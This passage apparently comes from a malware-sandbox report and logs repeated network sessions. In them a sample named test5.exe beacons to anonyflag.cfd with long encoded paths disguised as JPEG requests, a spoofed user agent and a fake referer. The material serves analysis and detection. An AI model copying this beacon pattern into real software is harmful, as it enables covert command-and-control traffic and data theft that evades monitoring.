cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1592&rtt_var=609&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1777236&cwnd=221&unsent_bytes=0&cid=06c47503e70aefe7&ts=502&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49852	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:29 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:29 UTC	872	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:29 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:37:29 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ctwCQ5SVK958HEhF8VLoWM1AcI8SubmorgwFEvFg4awSmxXCifwTDYWuP6EHJkKZ5aHXvExLfSskm1IdTHXdm096cGkVq3Y3MqhqqpelVU3VxW7Hlz%2BCu7pesawbhkYY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90ea5279060c88-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1730&min_rtt=1724&rtt_var=660&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1189&delivery_rate=1642294&cwnd=217&unsent_bytes=0&cid=df03a46aef057547&ts=493&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49857	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:30 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:31 UTC	872	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:31 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:37:31 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bnkZWw%2BxEvDV2YMp3RtW7vfyy4lPpx3AnaA9GiP2oAxkvpheBRp6Vs236nXYhp8M3LsBnqxHRCxiNPVxoc0Ylxh0tnoKiPloYKYWuAqiYXtF1qMljIu8iyr3f92j9oac"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90ea5e29970f93-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1632&min_rtt=1624&rtt_var=626&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1722713&cwnd=168&unsent_bytes=0&cid=9d5392826a350c89&ts=503&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49863	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:32 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:33 UTC	876	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:33 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:37:33 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tPbBgHs%2F%2Bf0Fv41tGcVUESAv68Jb3X2jBMqm50w1fDaQhnKQlLwi3GIn0fm0BVWWsun5RyQZuMyPspQ%2FjALH7Mzp88XnHIgEHpewba58zUEpXb1seQrELNOx46GlqbfR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90ea6a291b0f74-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1485&min_rtt=1484&rtt_var=558&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1189&delivery_rate=1955793&cwnd=151&unsent_bytes=0&cid=ae9eb22cbc64eff2&ts=514&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49869	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:34 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:35 UTC	878	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:35 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:37:35 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XlAMoKNLVTbyAydZ4BwdAdCHJFTidQaNRHInSUJAuq2pm1CpSLq091OiTQ1Ar3FYH9SSXVpl77%2FuC8CheLdFefDOMis%2BF8lD%2BSIExA5V3oiVUANaFWHzA3%2FUwy8Suble"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90ea764af91849-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1480&min_rtt=1472&rtt_var=569&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1189&delivery_rate=1894873&cwnd=180&unsent_bytes=0&cid=76df2267e11b8122&ts=511&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49875	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:36 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:37 UTC	880	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:37 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:37:37 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YctDLF0ebprY88S%2FgBW04vL00cx85iE2hqgHHWdB1haOgfR%2FGlc70wgxYEzzCVD%2FsgS%2BF1NOEN60SNpXIC7aC8P62eryW8bnskXUyZDE3HKYdurG%2FyO5OuhjNoy7drOq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90ea832a526a59-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1587&rtt_var=607&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1783750&cwnd=246&unsent_bytes=0&cid=ed200f0d2f5ebd79&ts=503&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49879	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:39 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:39 UTC	882	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:39 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:37:39 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iiu3JQaYbflTUoYn%2BzzC6BTFRG1oYSFUK9oE%2BIGtXWrZozjoKJGSJIH1nOi%2FIaSWuZuCvBKtnEqqu5X883VPzr%2FolLrqRsdwjkFzF9n%2F%2FAhxVKn5WxD73i1wKIYwCQzV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90ea90ba0443ac-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1690&min_rtt=1677&rtt_var=656&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1635854&cwnd=181&unsent_bytes=0&cid=0f366e50e3a5d320&ts=505&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49884	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:40 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:41 UTC	876	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:41 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:37:41 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B6cmq5vyQULzb%2Fse8HwrS16dtqYVRagTvQeEnFjDSqIKTUpUv2z7v79kKF8SBWrpjA6IrHYPK%2Bckcwyt4tcDxufyXYvabt81q8bU0rgpIw5%2Bb3TeZL3E9fhI1yAn94JJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90ea9ccb388ccd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1954&min_rtt=1949&rtt_var=741&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1468074&cwnd=195&unsent_bytes=0&cid=a84eb0ad6e7b2f4b&ts=513&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49888	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:42 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:43 UTC	872	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:43 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:37:43 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=II1XKat6k2mrQ98iUfxHgHayL6DP9dYC6AZnhu7PNegFa1gxQj6ppB0jDfI1rTRxSWBQElByDPieeN8cwaHYMVpSBhIR6gxDtkuXlhX2wWC4zIpHRQqU7FbqKX%2FGW8xZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90eaa83bbb4299-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1678&min_rtt=1629&rtt_var=709&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1442687&cwnd=251&unsent_bytes=0&cid=8c25e55b5eb16445&ts=493&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49894	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:44 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:45 UTC	872	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:45 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:37:45 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OgY9izGfrl3La3p4WGtcEa51HzQJGuKCp8HjZcvEYftRXIApk9VAr%2FBGInZ0uTz6Rb7S9dG0oXRlvbjYyRdTxQg6bdvoQ2ji7eV9GtS2qJR69RnwH2z1xsKg0XgKZdWl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90eab43fd55e65-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1686&min_rtt=1677&rtt_var=648&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1189&delivery_rate=1664766&cwnd=242&unsent_bytes=0&cid=99310fbbcc9629ea&ts=515&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49900	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:46 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:47 UTC	886	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:46 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: HIT Age: 1 Last-Modified: Sat, 28 Dec 2024 10:37:45 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zvlCYEHDh%2BYuX%2B029HZjKG7WLgf0E8A%2BuwPW6KUKOwXk523fm7DJX0AU1%2B1cJPX8dYi0ewv3D5jrzCKVOj7szyAu1MlGamAGAdzGmhq0%2B8%2BHMO7niesmcnqXCIC1jbM1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90eabff877436f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2025&min_rtt=1999&rtt_var=803&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1319475&cwnd=182&unsent_bytes=0&cid=ec990120fa8adad1&ts=459&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49904	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:48 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:48 UTC	874	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:48 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:37:48 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j%2Bnqc5DBNF0aQVCXPGRK6J1HNR7GVeOcesbOe37f7e5OSD6MbjCMV6FsBk4DKf17RvhwQw1CSShe5YDq33%2FjHHeoGsaCAprqjgmMQHnqAPHads80p9WNPWK6L7gNTVzn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90eacb6d810f85-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1466&min_rtt=1461&rtt_var=558&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1941489&cwnd=204&unsent_bytes=0&cid=5beca4df4312076c&ts=500&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49909	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:50 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:50 UTC	878	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:50 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:37:50 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TlxdtfZKS3tyEpP8Z%2BnokUKRkyifUxPP4CIfSKP8JA41189ABOjkzWNr9BQVTLeRf6rXtQ%2BVuevS2P5kvmjLZDkscXBC%2Bm%2BZF8a509kMBrY8WGGEO9ihB0qQ4KRihRqE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90ead77c4c42bc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1694&min_rtt=1645&rtt_var=715&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1189&delivery_rate=1432074&cwnd=225&unsent_bytes=0&cid=d7ea6068897f536f&ts=514&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49915	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:52 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:52 UTC	884	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:52 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:37:52 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ssHvisfquwi3%2BePT772ikHN%2FNaQqutVI%2BEukeqEscooOEBlocEsdWfrQA6InNq3hvMP4Auhg3SR%2FePUEka%2FGlh59brxM1cXvz59OthsfIa%2BXcvHEv%2BbInChn5onTnq7P"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90eae33e0b8c30-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1785&min_rtt=1781&rtt_var=677&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1604395&cwnd=215&unsent_bytes=0&cid=ab35e64ca3246ee4&ts=521&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49921	104.21.34.5	443	6608	C:\Users\user\Desktop\test5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 10:37:54 UTC	575	OUT	GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/l;q=0.8 Referer: http://www.google.com Host: anonyflag.cfd Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Connection: Keep-Alive
2024-12-28 10:37:54 UTC	878	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 10:37:54 GMT Content-Type: img/jpg Content-Length: 0 Connection: close Cache-Control: max-age=14400 X-Powered-By: Apache CF-Cache-Status: EXPIRED Last-Modified: Sat, 28 Dec 2024 10:37:54 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gvdkoVEJYHiv1J%2BqC9enkv5b1GConLhpis0QO4WThXiNYuq7f2PxF%2FpPrKH%2FJj9fRollQ%2FWy0NpoLP5NXGdHz3IdbKXEcLSnalxzN5z0jIwodjamTXeyitoECIxQua2k"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90eaf0dc380cb0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1605&rtt_var=622&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1730883&cwnd=243&unsent_bytes=0&cid=5282301518a155bd&ts=509&x=0"

